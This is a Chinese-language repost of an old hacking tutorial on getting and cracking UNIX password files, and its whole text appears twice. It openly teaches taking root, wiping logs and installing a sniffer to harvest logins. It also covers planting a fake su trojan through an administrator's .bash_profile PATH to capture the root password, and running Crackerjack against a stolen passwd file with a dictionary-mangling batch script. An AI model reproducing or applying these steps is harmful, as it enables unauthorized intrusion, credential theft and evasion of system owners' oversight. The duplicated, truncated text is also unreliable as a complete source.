從UNIX系統(tǒng)獲取密碼檔(二)
發(fā)布日期:2022-01-02 11:14 | 文章來源:gibhub
主題:
破解(Cracking)passwrd 文檔
與新手交談
困難的方法
利用mount命令獲取訪問權(quán)限
有很多方法可以獲得一個起始帳號.我將深入每個方面幫助你開始.你所需的只是一個好的帳號,用來獲得數(shù)百個帳號.想一想這:你進入一個很好的可以利用的系統(tǒng)(大多是Linux機器;),奪取root權(quán)限并裝上一個Sniffer(嗅探器);這個TCP sniffer 將監(jiān)測到網(wǎng)絡(luò)上任何login(登陸)過程并記錄下所有Telnet,F(xiàn)tp或撥號進出的Login 名和口令;這樣即使是一個小以太網(wǎng)你也可獲得大約100個口令,如果是一個更大的網(wǎng)絡(luò)供應(yīng)商你就會得到全世界的數(shù)百個帳號!這一切,你只要有某個可利用系統(tǒng)的一個好帳號和口令就可做到!如果你看起來無法利用某系統(tǒng)的root權(quán)限,那就拿它來破解口令,用來和那些但沒有shell帳號或磁盤空間的其他hacker及IRC使用者交換.決不要把一個你有root權(quán)限的系統(tǒng)的口令給出去!你自己留著它!
OK,讓我們開始深入獲取你的第一個帳號的方法.Go!
--------------------------------------------------------------------------------
破解passwd 文檔
如果你是按照心中正確的框架去hacking的話,一般都是先運行破解程序直到得到一個可以進入此系統(tǒng)的好帳號.然后Login上去看看能否奪取系統(tǒng)的root權(quán)限.如果可以,拿了root,移取用得著的文檔到你的子目錄里,抹去你的在場痕跡,清除所有日志.這樣就準備好可以安裝Sniffer了.
為何要去破解那些只用24小時就可破解出大部分口令的系統(tǒng)?我們的目的不僅僅是正在hack的機器,還有那些與之相連的機器.如果某系統(tǒng)沒有利用價值,不要在它上面浪費時間,去尋找下一個目標.后注:如果你僅僅是為了得到上面所說的交換帳號的口令那又另當(dāng)別論.
得到一個管理員的帳號后,你可能會想讀一讀他的歷史文檔,看看他是否曾用過SU命令成為root.如果有,你就可以用SU特洛伊木馬幫你奪取root口令.它如此工作:你更改他(管理員)的Shell腳本使得一隱藏目錄(.term)被很好安置在搜尋路徑里所有目錄之前.把偽SU程序放在該.term(或其他)目錄里.他鍵下SU,對他來說一切都如常,在提示下他鍵入root口令,然后口令就悄悄地被拷貝到/tmp/.elm69的log文檔里,同時刪除偽SU文件,并返回一個摽諏畬頂?shù)男畔⒆屗僭囈淮危芾韱T一定認為是他輸入錯了,便再次運行SU,但這回是真的SU了.
在后面的uuencode過的附錄里,你可找到假SU程序.
這是DOC文檔:
Fake SU by Nfin8 - i-e
IRC: /msg i-e
Easy as 1,2,3 ...
1.更改路徑到你已有訪問權(quán)限的用戶帳號上,此前你應(yīng)已從歷史文檔中看到他曾用過SU命令;先建立放SU特洛伊程序的目錄.最好是.term或.elm.
2.確定已編輯過su.c的頭部指向你所用路徑,使得SU特洛伊可自我刪除并在第二次嘗試讓真SU程序運行.
3.把所有文件放進目標目錄,并編譯su.c.
gcc su.c -o su
然后刪除SU以外的所有文件.一切搞定!
.bash_profile 結(jié)構(gòu)如下:
# .bash_profile
# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
# User specific environment and startup programs
PATH=$PATH:$HOME/bin
ENV=$HOME/.bashrc
USERNAME=""
export USERNAME ENV PATH
把第一行改為:PATH=$HOME/.term:$PATH:$HOME/bin
當(dāng)系統(tǒng)管理員運行SU時,就會先運行在.term里的SU特洛伊然后報告口令出錯.SU特洛伊程序會在/tmp目錄創(chuàng)建包含鍵入的root口令(或帳戶口令)的隱藏文件.如果是非root帳戶,它還記錄帳戶名.然后SU特洛伊自我刪除使得下次嘗試將運行真正的SU程序.
你可在/etc目錄下的passwd文檔前部找到管理員的用戶名.只需打:more passwd
你可確信passwd文檔的頭一二個帳戶就是管理員的,雖然有時你也能找到其他人的目錄如/staff/username.
歷史文檔在每個用戶目錄里.通過閱讀它們,你可看到該用戶最近使用過的命令,有時能看到最近的100多個命令.尋找.bash_history或history文件,你可用more命令讀它們:more .bash_history,也可:more .b*或more .b(然后按鍵盤上的Tab鍵).
OK,現(xiàn)在你需要一個好的password破解程序.下一章你可看到在沒有帳號時如何從系統(tǒng)奪取password文檔.但是it is catch 22(我不懂了?:譯者),你還是要用到password破解程序.
你需要下列三樣?xùn)|東:
1. Password破解程序
2. 好的字典檔
3. Password 文檔
初學(xué)者最好的password破解程序當(dāng)數(shù)Crackerjack,搜尋Web頁可以很容易找到它.Down下來準備開始.如果你已有所入門,可down一個unix版本的Cjack并在shell環(huán)境下運行它.但如你是初學(xué),down一個DOS/OS/2版本好了.
此外還要找一些好字典檔.最好的字典檔就是名字(names)了.你會在網(wǎng)絡(luò)上發(fā)現(xiàn)最不可靠的口令如男孩的女友名,女孩的男友名啦:)象如'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords'’ hackersdict’這樣為名的字典檔是最好的.
裝載crackerjack如:[D:\jack]jack
Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark
PWfile(s) : domain.com.passwd
Wordfile : domain.com.passwd
上面把password文檔作為字典檔.這會讓你先找出那些用登陸名(Login name)作口令的用戶,如果用真名(real name )或公司名之類的信息的話,也能馬上猜中.這樣你就不用苦苦等候程序搜索整個字典檔了.
如果想hash(我譯做:擴充)字典檔以得到更多的詞量,可參讀crackerjack的DOC文檔.
所謂hashing(擴充)就是你可告訴crackerjack更改字典檔中的詞例如在單詞的前后加一些數(shù)字或字母,就象sandy1或1sandy.你會發(fā)現(xiàn)很多用戶這樣做并以為這更可靠.
下面就是為口令文檔和字典檔寫的hashing文件.通過觀察它們,你就會明白你如何修改它們或創(chuàng)建新的hashing文件以滿足自己的需要.
------------ start of dicthash.bat
@echo off
cls
echo - THIS FILE FOR DOS MACHINES
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your dict and
echo - password file. Then use this batch file using the following format:
echo -
echo - dicthash.bat dictfilename.ext passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - dicthash will first load jack running the dict file against your
echo - password file in both cases, then it will add numbers 0-9 both to
echo - the begining and end of every dict word. This will take a while,
echo - so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)
jpp -lower %1 | jack -stdin %2
jpp %1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
破解(Cracking)passwrd 文檔
與新手交談
困難的方法
利用mount命令獲取訪問權(quán)限
有很多方法可以獲得一個起始帳號.我將深入每個方面幫助你開始.你所需的只是一個好的帳號,用來獲得數(shù)百個帳號.想一想這:你進入一個很好的可以利用的系統(tǒng)(大多是Linux機器;),奪取root權(quán)限并裝上一個Sniffer(嗅探器);這個TCP sniffer 將監(jiān)測到網(wǎng)絡(luò)上任何login(登陸)過程并記錄下所有Telnet,F(xiàn)tp或撥號進出的Login 名和口令;這樣即使是一個小以太網(wǎng)你也可獲得大約100個口令,如果是一個更大的網(wǎng)絡(luò)供應(yīng)商你就會得到全世界的數(shù)百個帳號!這一切,你只要有某個可利用系統(tǒng)的一個好帳號和口令就可做到!如果你看起來無法利用某系統(tǒng)的root權(quán)限,那就拿它來破解口令,用來和那些但沒有shell帳號或磁盤空間的其他hacker及IRC使用者交換.決不要把一個你有root權(quán)限的系統(tǒng)的口令給出去!你自己留著它!
OK,讓我們開始深入獲取你的第一個帳號的方法.Go!
--------------------------------------------------------------------------------
破解passwd 文檔
如果你是按照心中正確的框架去hacking的話,一般都是先運行破解程序直到得到一個可以進入此系統(tǒng)的好帳號.然后Login上去看看能否奪取系統(tǒng)的root權(quán)限.如果可以,拿了root,移取用得著的文檔到你的子目錄里,抹去你的在場痕跡,清除所有日志.這樣就準備好可以安裝Sniffer了.
為何要去破解那些只用24小時就可破解出大部分口令的系統(tǒng)?我們的目的不僅僅是正在hack的機器,還有那些與之相連的機器.如果某系統(tǒng)沒有利用價值,不要在它上面浪費時間,去尋找下一個目標.后注:如果你僅僅是為了得到上面所說的交換帳號的口令那又另當(dāng)別論.
得到一個管理員的帳號后,你可能會想讀一讀他的歷史文檔,看看他是否曾用過SU命令成為root.如果有,你就可以用SU特洛伊木馬幫你奪取root口令.它如此工作:你更改他(管理員)的Shell腳本使得一隱藏目錄(.term)被很好安置在搜尋路徑里所有目錄之前.把偽SU程序放在該.term(或其他)目錄里.他鍵下SU,對他來說一切都如常,在提示下他鍵入root口令,然后口令就悄悄地被拷貝到/tmp/.elm69的log文檔里,同時刪除偽SU文件,并返回一個摽諏畬頂?shù)男畔⒆屗僭囈淮危芾韱T一定認為是他輸入錯了,便再次運行SU,但這回是真的SU了.
在后面的uuencode過的附錄里,你可找到假SU程序.
這是DOC文檔:
Fake SU by Nfin8 - i-e
IRC: /msg i-e
Easy as 1,2,3 ...
1.更改路徑到你已有訪問權(quán)限的用戶帳號上,此前你應(yīng)已從歷史文檔中看到他曾用過SU命令;先建立放SU特洛伊程序的目錄.最好是.term或.elm.
2.確定已編輯過su.c的頭部指向你所用路徑,使得SU特洛伊可自我刪除并在第二次嘗試讓真SU程序運行.
3.把所有文件放進目標目錄,并編譯su.c.
gcc su.c -o su
然后刪除SU以外的所有文件.一切搞定!
.bash_profile 結(jié)構(gòu)如下:
# .bash_profile
# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
# User specific environment and startup programs
PATH=$PATH:$HOME/bin
ENV=$HOME/.bashrc
USERNAME=""
export USERNAME ENV PATH
把第一行改為:PATH=$HOME/.term:$PATH:$HOME/bin
當(dāng)系統(tǒng)管理員運行SU時,就會先運行在.term里的SU特洛伊然后報告口令出錯.SU特洛伊程序會在/tmp目錄創(chuàng)建包含鍵入的root口令(或帳戶口令)的隱藏文件.如果是非root帳戶,它還記錄帳戶名.然后SU特洛伊自我刪除使得下次嘗試將運行真正的SU程序.
你可在/etc目錄下的passwd文檔前部找到管理員的用戶名.只需打:more passwd
你可確信passwd文檔的頭一二個帳戶就是管理員的,雖然有時你也能找到其他人的目錄如/staff/username.
歷史文檔在每個用戶目錄里.通過閱讀它們,你可看到該用戶最近使用過的命令,有時能看到最近的100多個命令.尋找.bash_history或history文件,你可用more命令讀它們:more .bash_history,也可:more .b*或more .b(然后按鍵盤上的Tab鍵).
OK,現(xiàn)在你需要一個好的password破解程序.下一章你可看到在沒有帳號時如何從系統(tǒng)奪取password文檔.但是it is catch 22(我不懂了?:譯者),你還是要用到password破解程序.
你需要下列三樣?xùn)|東:
1. Password破解程序
2. 好的字典檔
3. Password 文檔
初學(xué)者最好的password破解程序當(dāng)數(shù)Crackerjack,搜尋Web頁可以很容易找到它.Down下來準備開始.如果你已有所入門,可down一個unix版本的Cjack并在shell環(huán)境下運行它.但如你是初學(xué),down一個DOS/OS/2版本好了.
此外還要找一些好字典檔.最好的字典檔就是名字(names)了.你會在網(wǎng)絡(luò)上發(fā)現(xiàn)最不可靠的口令如男孩的女友名,女孩的男友名啦:)象如'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords'’ hackersdict’這樣為名的字典檔是最好的.
裝載crackerjack如:[D:\jack]jack
Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark
PWfile(s) : domain.com.passwd
Wordfile : domain.com.passwd
上面把password文檔作為字典檔.這會讓你先找出那些用登陸名(Login name)作口令的用戶,如果用真名(real name )或公司名之類的信息的話,也能馬上猜中.這樣你就不用苦苦等候程序搜索整個字典檔了.
如果想hash(我譯做:擴充)字典檔以得到更多的詞量,可參讀crackerjack的DOC文檔.
所謂hashing(擴充)就是你可告訴crackerjack更改字典檔中的詞例如在單詞的前后加一些數(shù)字或字母,就象sandy1或1sandy.你會發(fā)現(xiàn)很多用戶這樣做并以為這更可靠.
下面就是為口令文檔和字典檔寫的hashing文件.通過觀察它們,你就會明白你如何修改它們或創(chuàng)建新的hashing文件以滿足自己的需要.
------------ start of dicthash.bat
@echo off
cls
echo - THIS FILE FOR DOS MACHINES
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your dict and
echo - password file. Then use this batch file using the following format:
echo -
echo - dicthash.bat dictfilename.ext passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - dicthash will first load jack running the dict file against your
echo - password file in both cases, then it will add numbers 0-9 both to
echo - the begining and end of every dict word. This will take a while,
echo - so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)
jpp -lower %1 | jack -stdin %2
jpp %1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
上一頁12 3 4 5 下一頁 閱讀全文
版權(quán)聲明:本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
相關(guān)文章
下一篇: